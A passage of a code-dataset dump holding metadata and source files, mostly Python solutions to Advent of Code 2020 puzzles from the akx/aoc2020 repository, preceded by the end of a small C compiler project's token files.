++i)\n\t{\n\t\tcout << (symtab->func_name_table[fnptr].paramlist_ptr[i]).name << \"(\"<<(symtab->func_name_table[fnptr].paramlist_ptr[i]).type <<\")(\" << (symtab->func_name_table[fnptr].paramlist_ptr[i]).level <<\") \";\n\t}\n\tcout << endl <<\"\\t>>Var : \";\n\tauto loc_ptr = symtab->func_name_table[fnptr].loc_varlist_ptr;\n\tfor (int i = 0; i < loc_ptr.size(); ++i)\n\t{\n\t\tcout << (loc_ptr[i]).name << \"(\"<<(loc_ptr[i]).type <<\")(\" << (loc_ptr[i]).level<<\")\" << \" \" << loc_ptr[i].var_tag << \" \" ;\n\t\tfor(auto it = loc_ptr[i].dimlist_ptr->begin(); it != loc_ptr[i].dimlist_ptr->end(); it++) {\n\t\t\tcout << *it << \" \";\n\t\t}\n\n\t}\n\tcout << endl;\n}\nint SymTable::add_function(string name, string result_type) {\n\tint fn_ptr = symtab->func_name_table.size();\n\t// cout << fn_ptr << endl;\n\tFuncNameRecord fn_record;\n\tfn_record.name = name;\n\tfn_record.result_type = result_type;\n\tfn_record.num_params = 0;\n\tfn_record.returned = false;\n\tsymtab->func_name_table.push_back(fn_record);\n\tsymtab->func_name_table[fn_ptr].loc_varlist_ptr = symtab->func_name_table[0].loc_varlist_ptr;\n\treturn fn_ptr;\n}\n\nint SymTable::add_param(int fn_ptr, string param_name, string type) {\n\tVarNameRecord param;\n\tparam.name = param_name;\n\tparam.type = type;\n\t// param.var_tag = var_tag;\n\tparam.level =1;\n\tsymtab->func_name_table[fn_ptr].paramlist_ptr.push_back(param);\n\tsymtab->func_name_table[fn_ptr].num_params += 1;\n\treturn symtab->func_name_table[fn_ptr].paramlist_ptr.size() - 1;\n}\n\nint SymTable::add_var(int fn_ptr, string var_name, string type, int level, string var_tag, vector<int> *dimlist_ptr) {\n\tVarNameRecord 
var;\n\tvar.name = var_name;\n\tvar.type = type;\n\tvar.level =level;\n\tvar.var_tag = var_tag;\n\tvar.dimlist_ptr = dimlist_ptr;\n\tsymtab->func_name_table[fn_ptr].loc_varlist_ptr.push_back(var);\n\treturn symtab->func_name_table[fn_ptr].loc_varlist_ptr.size() - 1;\n}\n\n\n// Patch datatype to the parameter of \"active\" function\n// Returns 1 if success, 0 if fails\nint SymTable::patch(string type, list<int> *var_list, int level) {\n\tlist<int>::const_iterator iter;\n\tint func_var_count = symtab->func_name_table[active_func_ptr].loc_varlist_ptr.size();\n\tfor (iter = var_list->begin(); iter != var_list->end(); ++iter) {\n\t if (*iter >= func_var_count)\n\t {\n\t \treturn 0;\n\t }\n\t if (level == symtab->func_name_table[active_func_ptr].loc_varlist_ptr[*iter].level)\n\t {\n\t \tsymtab->func_name_table[active_func_ptr].loc_varlist_ptr[*iter].type = type;\t\n\t }\n\t \n\t}\n\treturn 1;\n}\n\nvoid SymTable::check_param_type(int call_ptr, int param_num, string type, bool &ok) {\n\tif (call_ptr < this->func_name_table.size() && param_num < this->func_name_table[call_ptr].num_params)\n\t{\t\n\t\tif(this->func_name_table[call_ptr].paramlist_ptr[param_num - 1].type == type) \n\t\t\tok = true;\n\t\telse \n\t\t\tok = false;\t\t\n\t}\n\telse{\n\t\tok = false;\t\n\t}\n\t\n\t\t\n}" }, { "alpha_fraction": 0.5723025798797607, "alphanum_fraction": 0.5723025798797607, "avg_line_length": 34.25490188598633, "blob_id": "ab3b96c831511ab0a6135ef998d1cc0e2d10c296", "content_id": "6d801f990e93afc6d1dfbd9f16879b1894053218", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 1798, "license_type": "no_license", "max_line_length": 70, "num_lines": 51, "path": "/tokens.h", "repo_name": "prateekvij/FrontEnd-C-Compiler", "src_encoding": "UTF-8", "text": "\"if\" \t\t\t\t\tRET(\"IF\", IF)\n\"else\" \t\t\t\t\tRET(\"ELSE\", ELSE)\n\"while\"\t\t\t\t\tRET(\"WHILE\", WHILE)\n\"do\" \t\t\t\t\tRET(\"DO\", DO)\n\"for\" \t\t\t\t\tRET(\"FOR\", FOR)\n\"main\" \t\t\t\t\tRET(\"MAIN\", MAIN)\n\"struct\"\t\t\t\tRET(\"STRUCT\", STRUCT)\n\"return\" \t\t\t\tRET(\"RETURN\", RETURN)\n\"default\" \t\t\t\tRET(\"DEFAULT\", DEFAULT)\n\"const\" \t\t\t\tRET(\"CONST\", CONST)\n\"break\" \t\t\t\tRET(\"BREAK\", BREAK)\n\"continue\" \t\t\t\tRET(\"CONTINUE\", CONTINUE)\n\"goto\" \t\t\t\t\tRET(\"GOTO\", GOTO)\n\"void\" \t\t\t\t\tRET(\"VOID\", VOID)\n\"int\" \t\t\t\t\tRET(\"INT\", INT)\n\"float\" \t\t\t\tRET(\"FLOAT\", FLOAT)\n\"char\" \t\t\t\t\tRET(\"CHAR\", CHAR)\n\"semicolon\" \t\t\tRET(\"SEMICOLON\", SEMICOLON)\n\"comma\" \t\t\t\tRET(\"COMMA\", COMMA)\n\"left_sq_bracket\" \t\tRET(\"LEFT_SQ_BRACKET\", LEFT_SQ_BRACKET)\n\"right_sq_bracket\" \t\tRET(\"RIGHT_SQ_BRACKET\", RIGHT_SQ_BRACKET)\n\"left_curly_bracket\" \tRET(\"LEFT_CURLY_BRACKET\", LEFT_CURLY_BRACKET)\n\"right_curly_bracket\" \tRET(\"RIGHT_CURLY_BRACKET\", RIGHT_CURLY_BRACKET)\n\"lp\" \t\t\t\t\tRET(\"LP\", LP)\n\"rp\" \t\t\t\t\tRET(\"RP\", RP)\n\"plus\" \t\t\t\t\tRET(\"PLUS\", PLUS)\n\"minus\" \t\t\t\tRET(\"MINUS\", MINUS)\n\"asterisk\" \t\t\t\tRET(\"ASTERISK\", ASTERISK)\n\"divide\" \t\t\t\tRET(\"DIVIDE\", DIVIDE)\n\"dot\" \t\t\t\t\tRET(\"DOT\", DOT)\n\"dereference\" \t\t\tRET(\"DEREFERENCE\", DEREFERENCE)\n\"amp\" \t\t\t\t\tRET(\"AMP\", AMP)\n\"modulo\" \t\t\t\tRET(\"MODULO\", MODULO)\n\"assign_op\" \t\t\tRET(\"ASSIGN_OP\", ASSIGN_OP)\n\"and_exp\" \t\t\t\tRET(\"AND_EXP\", AND_EXP)\n\"or_exp\" \t\t\t\tRET(\"OR_EXP\", OR_EXP)\n\"not_exp\" \t\t\t\tRET(\"NOT_EXP\", NOT_EXP)\n\"right_shift\" \t\t\tRET(\"RIGHT_SHIFT\", 
RIGHT_SHIFT)\n\"left_shift\" \t\t\tRET(\"LEFT_SHIFT\", LEFT_SHIFT)\n\"and_bit\" \t\t\t\tRET(\"AND_BIT\", AND_BIT)\n\"or_bit\" \t\t\t\tRET(\"OR_BIT\", OR_BIT)\n\"lt\" \t\t\t\t\tRET(\"LT\", LT)\n\"gt\" \t\t\t\t\tRET(\"GT\", GT)\n\"eq\" \t\t\t\t\tRET(\"EQ\", EQ)\n\"lte\" \t\t\t\t\tRET(\"LTE\", LTE)\n\"gte\" \t\t\t\t\tRET(\"GTE\", GTE)\n\"integer\" \t\t\t\tRET(\"INTEGER\", INTEGER)\n\"char\" \t\t\t\t\tRET(\"CHAR\", CHAR)\n\"string\" \t\t\t\t\tRET(\"STRING\", STRING)\n\"float\" \t\t\t\t\tRET(\"FLOAT\", FLOAT)\n\"id\" \t\t\t\t\tRET(\"ID\", ID)\n" }, { "alpha_fraction": 0.5582524538040161, "alphanum_fraction": 0.5679611563682556, "avg_line_length": 28.428571701049805, "blob_id": "51c02db6cfad3ecad90ec1877ca00b00a45c9fd5", "content_id": "4440ba3f2b57f5903885b55d90cf220cd7831c22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 206, "license_type": "no_license", "max_line_length": 85, "num_lines": 7, "path": "/generate_tokens.py", "repo_name": "prateekvij/FrontEnd-C-Compiler", "src_encoding": "UTF-8", "text": "out = open('tokens.h','w')\ntokens = open('tokens').readlines()\ni= 0\nfor token in tokens:\n\ti += 1\n\ttoken = token.strip()\n\tout.write(\"\\\"\"+token+\"\\\" \\t\\t\\t\\t\\tRET(\\\"\"+token.upper()+\"\\\", \"+token.upper()+\")\\n\")\n" } ]
5
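A toy rendering, in Python, of the level-based lookup that `symtable.h` above implements in `SymTable::search_var`: a variable is visible when the query level is at or inside the level where it was declared. The record layout and names here are illustrative only, not the compiler's actual structures.

```python
class FuncRecord:
    """One symbol-table entry per function, in the spirit of func_name_table."""
    def __init__(self, name, result_type):
        self.name = name
        self.result_type = result_type
        self.local_vars = []  # (name, type, declaration level)

table = {"main": FuncRecord("main", "int")}

def add_var(func, name, vtype, level):
    table[func].local_vars.append((name, vtype, level))

def search_var(func, name, level):
    # Mirrors the `l >= ...level` visibility test: a variable declared at
    # level 2 is visible at levels 2, 3, ... but not at level 1.
    for vname, vtype, vlevel in table[func].local_vars:
        if vname == name and level >= vlevel:
            return (vname, vtype, vlevel)
    return None

add_var("main", "a", "int", 2)
print(search_var("main", "a", 3))  # ('a', 'int', 2): visible in a nested block
print(search_var("main", "a", 1))  # None: level 1 is outside the declaration
```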
ayshih2/cs498midparser
https://github.com/ayshih2/cs498midparser
c803de5c3ecf4e0775c6427f9d27bb39370d978d
ef197282445f0ed2007f231d6152940b059b94fe
3c3d40dfd128a38031be99e27262ac09823a1818
refs/heads/master
2020-04-23T00:52:48.688280
2019-02-19T04:36:30
2019-02-19T04:36:30
170,795,153
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.5829260349273682, "alphanum_fraction": 0.5928640961647034, "avg_line_length": 41.625, "blob_id": "b02a3cf10cd646b9ac4a904170fd15320fca1959", "content_id": "a9900f76a21b32ca7e4bd1a72fabe72d86d1612f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6138, "license_type": "no_license", "max_line_length": 129, "num_lines": 144, "path": "/Parser.py", "repo_name": "ayshih2/cs498midparser", "src_encoding": "UTF-8", "text": "import csv\nimport os\nimport collections\nimport math\n\n# directory is the path to a folder of peer evaluation txt files\ndirectory = '/Users/annabelleshih/Desktop/CS498PeerEvaluations/peerevaluationstxtfiles'\n# key - netid, value - object w/ team #, num teammates, own score, averaged score from others\nstudents = {}\n# number of actual people per team - 8 teams total for SP19 CS 498 MID class\nteams = {\"1\": 0, \"2\": 0, \"3\": 0, \"4\": 0, \"5\": 0, \"6\": 0, \"7\": 0, \"8\": 0}\n\n\nclass grades:\n def __init__(self, team, own, other, num_teammates, teammates):\n self.team = team\n self.own = own\n self.other = other\n self.num_teammates = num_teammates\n self.teammates = teammates\n\n\n# populate students dict with netid as key and new grades object (default: team #, 0, 0, {})\nwith open(\"/Users/annabelleshih/Desktop/CS498PeerEvaluations/CS498_team_assignments.csv\") as csv_file:\n csv_reader = csv.reader(csv_file, delimiter=',')\n for row in csv_reader:\n if row:\n email = row[2]\n if email != \"Email\" and email != \"\":\n students[email[:email.find(\"@\")]] = grades(row[3], 0, 0, 0, {})\n # keep track of num students in a team\n teams[row[3]] += 1\n\n\n# since students enter score as [number]%, must strip % symbol\ndef get_score(score_str):\n return int(score_str[:score_str.find(\"%\")])\n\n\nfor filename in os.listdir(directory):\n if filename.endswith(\".txt\"):\n # read contents of each file\n with open(directory + \"/\" + filename, encoding=\"utf-8-sig\") as f:\n foundOwner = False\n findScore = False\n curr_student = \"\"\n owner = \"\"\n\n for line in f:\n # for some reason, downloading files from Compass gives me 2 versions. 
only want peer evaluation\n if \"Name:\" not in line:\n # must parse file\n curr_line = line.strip().lower()\n\n # if on prev iteration, have found a netid, now have to find associated score\n if findScore and curr_student == owner:\n students[curr_student].own = get_score(curr_line)\n findScore = False\n elif findScore and curr_student != owner:\n students[curr_student].num_teammates += 1\n students[curr_student].other += get_score(curr_line)\n # to keep track of what other students gave each other\n students[curr_student].teammates[owner] = get_score(curr_line)\n findScore = False\n\n # finding a netid\n if foundOwner is False and curr_line in students:\n foundOwner = True\n owner = curr_line\n curr_student = curr_line\n elif foundOwner is True and curr_line in students:\n # have found owner, on next iteration must get scores\n curr_student = curr_line\n findScore = True\n else:\n # file isn't the wanted peer evaluation file\n break\n continue\n else:\n # file isn't a txt file, whatever\n continue\n\n\ndef formattingForCompass(ownScore, teamAvg, teamnum):\n teamAvg = math.ceil(teamAvg) if (math.ceil(teamAvg) - teamAvg > 0.5) else math.floor(teamAvg)\n formattedStr = \"Team members' perception of your contribution for Assignment 1: {:0.1f}% (averaged) \\n\".format(teamAvg) \\\n + \"Your perception of your own contribution for Assignment 1: {}%\".format(ownScore)\n\n if ownScore < round(teamAvg):\n formattedStr += \"\\n\\nYou might be under-valuing the contribution that you are making to the team.\"\n elif teamAvg < ownScore:\n formattedStr += \"\\n\\nYou might need to make additional contributions to the team in future assignments or \" \\\n \"you might need to better demonstrate or communicate the contributions that you are making \" \\\n \"to the assignments.\"\n\n if ownScore < (100 / int(teams[teamnum])) and teamAvg < (100 / int(teams[teamnum])):\n formattedStr += \"\\nYou probably need to make additional contributions to the team assignments in the future.\"\n\n formattedStr += \"\\n\\nThis is some auto-generated text to help you interpret the scores you have received.\";\n\n return formattedStr\n\n\ndef main():\n students_w_no_submission = []\n no_teammates = []\n\n # sort students dictionary by netid\n sortedStudents = collections.OrderedDict(sorted(students.items()))\n\n for key in sortedStudents:\n curr_student = students[key]\n if curr_student.num_teammates != 0:\n if (curr_student.own == 0):\n students_w_no_submission.append(key)\n print(\"{} || Team #: {}, Number of teammates: {}\".format(key.upper(), curr_student.team, curr_student.num_teammates))\n for member, grade in curr_student.teammates.items():\n print(member + \": \" + str(grade) + \" \", end=\" \")\n print(\"\\nOwn Score: {}, Team Avg: {}\\n\".format(curr_student.own, curr_student.other / curr_student.num_teammates))\n else:\n no_teammates.append(key)\n\n # print students w/ submission issues\n print(\"\\nFollowing are the students who didn't give themselves a score or did not submit:\")\n for student in students_w_no_submission:\n print(student)\n\n # no teammates / probably an error due to the parser\n print(\"\\nFollowing students have no teammates:\")\n for student in no_teammates:\n print(student)\n\n # write to a txt file w/ everything formatted and ready to copy and paste to compass\n f = open('cs498compassformat.txt', 'w')\n for key in sortedStudents:\n student = students[key]\n f.write(key + \"\\n\")\n if student.num_teammates != 0:\n f.write(formattingForCompass(student.own, student.other / 
student.num_teammates, student.team) + \"\\n\\n\")\n f.close()\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.7857142686843872, "alphanum_fraction": 0.7928571701049805, "avg_line_length": 79, "blob_id": "ec0ad625f557c1f8cb6dc0ddc9c06987d01a4fd8", "content_id": "96cfad34d195edcb5dc21f8fff0cdd4ae7698806", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 560, "license_type": "no_license", "max_line_length": 176, "num_lines": 7, "path": "/README.md", "repo_name": "ayshih2/cs498midparser", "src_encoding": "UTF-8", "text": "# Parser for peer evaluations in CS 498 Mobile Interactive Design\n\n* probably (definitely) inefficient in places, because things were implemented just to make grading (hopefully) easier\n* the 8 teams are hard-coded in\n* prints each NetID, team number, the teammates and the scores they gave that individual, the averaged score and the self-score to the console\n* writes a formatted version (ready to be copied and pasted to Compass) to a file\n* basic idea: read all students in from the CSV file, then go through the individual peer evaluations to find the grade each student gave themselves and average the grades the others gave them\n" } ]
2
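The parser record above tallies, for each student, the score they gave themselves and the scores teammates gave them, then averages the latter for the Compass text. A minimal sketch of just that tallying step, with a hypothetical Student holder and made-up netids and scores (the real script fills these fields while walking the submission files):

class Student:
    def __init__(self):
        self.own = 0            # score the student gave themselves
        self.other = 0          # running sum of scores teammates gave them
        self.num_teammates = 0
        self.teammates = {}     # netid -> score received from that teammate

s = Student()
s.own = 40
for netid, score in [("alice2", 30), ("bob3", 25), ("carol4", 35)]:   # made-up data
    s.other += score
    s.num_teammates += 1
    s.teammates[netid] = score

team_avg = s.other / s.num_teammates
print("own: {}%, team average: {:0.1f}%".format(s.own, team_avg))    # own: 40%, team average: 30.0%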
akx/aoc2020
https://github.com/akx/aoc2020
8f961c4d85d9c0dc65b11f9df46e998f68373d06
c59bcd151eb0ab698b6a764943ba9c8d40684cf3
3bb48755b51ee8d1ac1c285f8b1028c41930ea22
refs/heads/master
2023-01-29T07:14:14.014092
2020-12-10T08:15:42
2020-12-10T08:15:42
317,480,487
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4801980257034302, "alphanum_fraction": 0.49504950642585754, "avg_line_length": 22.764705657958984, "blob_id": "78e8b3c5a04a2aa5ccd0336d32d1f2d58e7cdf47", "content_id": "3d1f275983206ed967df3a248390ad4002784ff1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 404, "license_type": "no_license", "max_line_length": 51, "num_lines": 17, "path": "/py/d09p02.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from d09lib import read_d09, get_weakness\n\n\ndef main():\n secret = get_weakness()\n values = list(read_d09())\n for a in range(len(values)):\n for b in range(a, len(values)):\n val_range = values[a:b]\n if sum(val_range) == secret:\n x = min(val_range) + max(val_range)\n print(x)\n return\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6003289222717285, "alphanum_fraction": 0.6151315569877625, "avg_line_length": 25.434782028198242, "blob_id": "7aef05b4e3b9013f2da2361370e080a2c531b2c0", "content_id": "ed70786d8ecdf7e67e7bbc7ea4ca67e69839b0c1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 608, "license_type": "no_license", "max_line_length": 71, "num_lines": 23, "path": "/py/d09lib.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from collections import deque\nfrom itertools import combinations\n\n\ndef read_d09(filename=\"../inputs/d09-input.txt\"):\n values = []\n with open(filename) as f:\n for l in f:\n values.append(int(l))\n return values\n\n\ndef get_weakness():\n values = deque(read_d09())\n preamble_length = 25\n buffer = deque(maxlen=preamble_length)\n while len(buffer) < preamble_length:\n buffer.append(values.popleft())\n while values:\n val = values.popleft()\n if not any(a + b == val for (a, b) in combinations(buffer, 2)):\n return val\n buffer.append(val)\n" }, { "alpha_fraction": 0.6785714030265808, "alphanum_fraction": 0.7214285731315613, "avg_line_length": 34, "blob_id": "cb8ec034f83216831bb2a521c5a787a5249b03fd", "content_id": "126ccebff1cabc16c920698c1db8f1b532381cc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 140, "license_type": "no_license", "max_line_length": 70, "num_lines": 4, "path": "/py/d04p01.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from d04lib import read_d04, required_fields\n\npassports = read_d04()\nprint(len([p for p in passports if set(p.keys()) >= required_fields]))\n" }, { "alpha_fraction": 0.584782600402832, "alphanum_fraction": 0.602173924446106, "avg_line_length": 19, "blob_id": "69a710c404931ecdbba99dcecec6a60949b9b313", "content_id": "216282fdf67d27bc481c0bb199b6a89bd8c01f63", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 460, "license_type": "no_license", "max_line_length": 69, "num_lines": 23, "path": "/py/d07p02.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from typing import Iterable\n\nfrom d07lib import read_d07, BagSpec\n\nbag_data = read_d07()\n\n\ndef recurse_bags(next: Iterable[BagSpec]):\n for bag_spec in next:\n for x in range(bag_spec.count):\n yield bag_spec.color\n yield from recurse_bags(bag_data.get(bag_spec.color, []))\n\n\ndef main():\n total = 0\n for bag in recurse_bags(bag_data[\"shiny gold\"]):\n total += 1\n print(total)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.5381165742874146, "alphanum_fraction": 0.573991060256958, 
"avg_line_length": 17.58333396911621, "blob_id": "2026540b9b8c95395b4e4d0f137859edb664be9a", "content_id": "bc3987fe725d17725705ffd233056c528df42ca8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 223, "license_type": "no_license", "max_line_length": 50, "num_lines": 12, "path": "/py/d08p01.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from d08lib import read_d08, State, run_until_loop\n\n\ndef main():\n ops = read_d08()\n state = State(opc=0, acc=0)\n rv = run_until_loop(state, ops)\n print(\"final state\", rv)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.47838616371154785, "alphanum_fraction": 0.5273775458335876, "avg_line_length": 18.27777862548828, "blob_id": "7f4a8ed15ab5452329e384d35e033eaea6827ca8", "content_id": "57d78a09ff73f394ff56e54e74771268323fd6ad", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 347, "license_type": "no_license", "max_line_length": 49, "num_lines": 18, "path": "/py/d10p01.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from d10lib import read_d10\n\n\ndef main():\n inputs = sorted(read_d10())\n deltas = []\n last = 0\n while inputs:\n curr = inputs.pop(0)\n deltas.append(curr - last)\n last = curr\n d1 = deltas.count(1)\n d3 = deltas.count(3) + 1 # lol, fudge factor\n print(d1, d3, d1 * d3)\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6391304135322571, "alphanum_fraction": 0.6695652008056641, "avg_line_length": 24.55555534362793, "blob_id": "0523734c953b6ffda61c0d013bc3b2eac202a3da", "content_id": "8de7c86e8a088ffc5da6f7ac470f54c18d47ac8d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 230, "license_type": "no_license", "max_line_length": 74, "num_lines": 9, "path": "/py/d06p02.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from d06lib import read_d06\nfrom collections import Counter\n\ngroups = read_d06()\ntotal = 0\nfor g in groups:\n counter = Counter(\"\".join(g))\n total += len([ans for (ans, cnt) in counter.items() if cnt == len(g)])\nprint(total)\n" }, { "alpha_fraction": 0.42146891355514526, "alphanum_fraction": 0.49152541160583496, "avg_line_length": 23.58333396911621, "blob_id": "5478baade9b4fe776bca73c0757200e375cb2eeb", "content_id": "67c028ea5ff94866750c2644c48f119692e6b321", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 885, "license_type": "no_license", "max_line_length": 62, "num_lines": 36, "path": "/py/d05lib.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from math import ceil\n\n\ndef decode_to_coords(bsp):\n x0 = y0 = 0\n y1 = 127\n x1 = 8\n for c in bsp:\n assert y1 >= y0\n if c == \"F\":\n y1 = y0 + (y1 - y0) // 2\n elif c == \"B\":\n y0 = y0 + ceil((y1 - y0) / 2)\n elif c == \"L\":\n x1 = x0 + (x1 - x0) // 2\n elif c == \"R\":\n x0 = x0 + ceil((x1 - x0) / 2)\n assert y1 - y0 <= 1\n assert x1 - x0 <= 1\n return min(x0, x1), min(y0, y1)\n\n\ndef coords_to_seat_id(coords):\n return coords[1] * 8 + coords[0]\n\n\ndef test_decode(bsp, real_coords, real_seat_id):\n coords = decode_to_coords(bsp)\n seat_id = coords_to_seat_id(coords)\n print(bsp, (coords, real_coords), (seat_id, real_seat_id))\n\n\nif __name__ == \"__main__\":\n test_decode(\"FBFBBFFRLR\", (5, 44), 357)\n test_decode(\"FFFBBBFRRR\", (7, 14), 119)\n test_decode(\"BFFFBBFRRR\", (7, 70), 567)\n" }, { 
"alpha_fraction": 0.5091575384140015, "alphanum_fraction": 0.5384615659713745, "avg_line_length": 23.81818199157715, "blob_id": "e13223dc45dae275f93e4a3033e55876430e917c", "content_id": "365c00bf78087b40f82edbda4e4766a149f38b7f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 273, "license_type": "no_license", "max_line_length": 57, "num_lines": 11, "path": "/py/d06lib.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "def read_d06():\n SEP = chr(30)\n with open(\"../inputs/d06-input.txt\") as f:\n data = f.read()\n data = data.replace(\"\\n\\n\", SEP)\n groups = [group.split() for group in data.split(SEP)]\n return groups\n\n\nif __name__ == \"__main__\":\n print(read_d06())\n" }, { "alpha_fraction": 0.6580796241760254, "alphanum_fraction": 0.6674473285675049, "avg_line_length": 27.46666717529297, "blob_id": "fb229da2cedfbad1b04749c6d074164c3a51ceb9", "content_id": "eb1c46c921c26c9582d23b5cbc5e1384c8cfacfe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 427, "license_type": "no_license", "max_line_length": 80, "num_lines": 15, "path": "/py/d05p02.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from d05lib import decode_to_coords, coords_to_seat_id\n\ncode_to_coords = {\n bsp: decode_to_coords(bsp) for bsp in open(\"../inputs/d05-input.txt\") if bsp\n}\ncode_to_seat_id = {\n bsp: coords_to_seat_id(coords) for (bsp, coords) in code_to_coords.items()\n}\n\nseats = set(code_to_seat_id.values())\nmin_seat = min(seats)\nmax_seat = max(seats)\nfor seat in range(min_seat, max_seat):\n if seat not in seats:\n print(seat)\n" }, { "alpha_fraction": 0.45768025517463684, "alphanum_fraction": 0.48275861144065857, "avg_line_length": 18.9375, "blob_id": "a08f874029a791171f1e0f1bba1bceefb8e83573", "content_id": "4aa17532fd2733848d2b5ed8f5f63f54936e8344", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 319, "license_type": "no_license", "max_line_length": 58, "num_lines": 16, "path": "/py/d03p01.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "trees = set()\nfor y, line in enumerate(open(\"../inputs/d03-input.txt\")):\n for x, c in enumerate(line):\n if c == \"#\":\n trees.add((x, y))\nmax_y = y\nmax_x = x\nx, y = 0, 0\ndx, dy = 3, 1\ncount = 0\nwhile y <= max_y:\n if (x % max_x, y) in trees:\n count += 1\n x += dx\n y += dy\nprint(count)\n" }, { "alpha_fraction": 0.5015197396278381, "alphanum_fraction": 0.5501520037651062, "avg_line_length": 26.41666603088379, "blob_id": "63e4facde22170fd9f4018fc558e76f8c0b0a46b", "content_id": "c979b5d5a9dddf257d6da832dae31d8cff86d492", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 329, "license_type": "no_license", "max_line_length": 60, "num_lines": 12, "path": "/py/d02p02.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "import re\n\npw_re = re.compile(\"^(\\d+)-(\\d+) (.): (.+)$\")\n\ncount = 0\nfor line in open(\"../inputs/d02-input.txt\"):\n pos1, pos2, chr, pw = pw_re.match(line.strip()).groups()\n pos1ok = pw[int(pos1) - 1] == chr\n pos2ok = pw[int(pos2) - 1] == chr\n if (pos1ok or pos2ok) and pos1ok ^ pos2ok:\n count += 1\nprint(count)\n" }, { "alpha_fraction": 0.5199999809265137, "alphanum_fraction": 0.5360000133514404, "avg_line_length": 24, "blob_id": "34030b77e8cff61f66a15a7cdd7896e28bba21c9", "content_id": "35b4add5281eac77646a267a1f8176cf1a43ad91", 
"detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 250, "license_type": "no_license", "max_line_length": 58, "num_lines": 10, "path": "/py/d02p01.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "import re\n\npw_re = re.compile(\"^(\\d+)-(\\d+) (.): (.+)$\")\n\ncount = 0\nfor line in open(\"../inputs/d02-input.txt\"):\n min, max, chr, pw = pw_re.match(line.strip()).groups()\n if int(min) <= pw.count(chr) <= int(max):\n count += 1\nprint(count)\n" }, { "alpha_fraction": 0.6689189076423645, "alphanum_fraction": 0.6824324131011963, "avg_line_length": 31.88888931274414, "blob_id": "6ad3a085256db474f70ad1c033f82ac49580cd0c", "content_id": "abaf50136b9316862c72780babc09e67437d792a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 296, "license_type": "no_license", "max_line_length": 80, "num_lines": 9, "path": "/py/d05p01.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from d05lib import decode_to_coords, coords_to_seat_id\n\ncode_to_coords = {\n bsp: decode_to_coords(bsp) for bsp in open(\"../inputs/d05-input.txt\") if bsp\n}\ncode_to_seat_id = {\n bsp: coords_to_seat_id(coords) for (bsp, coords) in code_to_coords.items()\n}\nprint(max(code_to_seat_id.values()))\n" }, { "alpha_fraction": 0.4909420311450958, "alphanum_fraction": 0.5144927501678467, "avg_line_length": 26.600000381469727, "blob_id": "0676e6b060472cc60002eeb0998717bd3bef9dcf", "content_id": "f45a1f7d4d86a76a11698354119e510c1918edb7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 552, "license_type": "no_license", "max_line_length": 68, "num_lines": 20, "path": "/py/d08p02.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from d08lib import read_d08, State, run_until_loop\n\n\ndef main():\n orig_ops = tuple(read_d08())\n *_, cand_ops = run_until_loop(State(opc=0, acc=0), orig_ops)\n for i in cand_ops:\n if orig_ops[i][0] == \"acc\":\n continue\n ops = list(orig_ops)\n ops[i] = (\"jmp\" if ops[i][0] == \"nop\" else \"nop\", ops[i][1])\n state = State(opc=0, acc=0)\n final_state, finished, _ = run_until_loop(state, ops)\n if finished:\n print(i, final_state)\n break\n\n\nif __name__ == \"__main__\":\n main()\n" }, { "alpha_fraction": 0.6224489808082581, "alphanum_fraction": 0.6836734414100647, "avg_line_length": 23.5, "blob_id": "f4fd1113277cc126b6d0a2611a0d20ca72bc0c9b", "content_id": "ee3fbb260c7d94bc5cbdb3d5990a7dba5dce80ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 98, "license_type": "no_license", "max_line_length": 48, "num_lines": 4, "path": "/py/d06p01.py", "repo_name": "akx/aoc2020", "src_encoding": "UTF-8", "text": "from 